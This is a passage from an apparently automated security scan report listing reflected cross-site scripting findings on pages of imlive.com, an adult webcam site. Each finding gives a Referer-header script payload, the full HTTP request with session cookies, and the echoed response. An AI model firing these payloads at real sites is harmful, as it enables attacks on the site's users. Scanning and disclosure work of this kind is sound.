Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2BBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2FLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3D; expires=Sat, 03-May-2008 14:05:14 GMT; path=/
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OFAEMBCBCGCOCIDCNNFPADIH; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:05:15 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10285

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107816009&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=e3d10'><script>alert(1)</script>76788ffdb68&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.950. http://imlive.com/hostmembers.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/hostmembers.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hostmembers.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:16 GMT
Connection: close
Content-Length: 10795
Vary: Accept-Encoding

<HTML>
   <HEAD>

       <TITLE>ImLive - Host Login</TITLE>

       <meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.951. http://imlive.com/live-sex-chats/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:05 GMT
Connection: close
Content-Length: 39949
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent
...[SNIP]...

4.952. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/adult-shows/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:41 GMT
Connection: close
Content-Length: 25196
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.953. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:23 GMT
Connection: close
Content-Length: 224507
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.954. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:34 GMT
Connection: close
Content-Length: 27209
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

4.955. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/hotspots/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:14 GMT
Connection: close
Content-Length: 40632
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.956. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cams-aroundthehouse/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:31 GMT
Connection: close
Content-Length: 33186
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.957. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/caught-on-cam/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
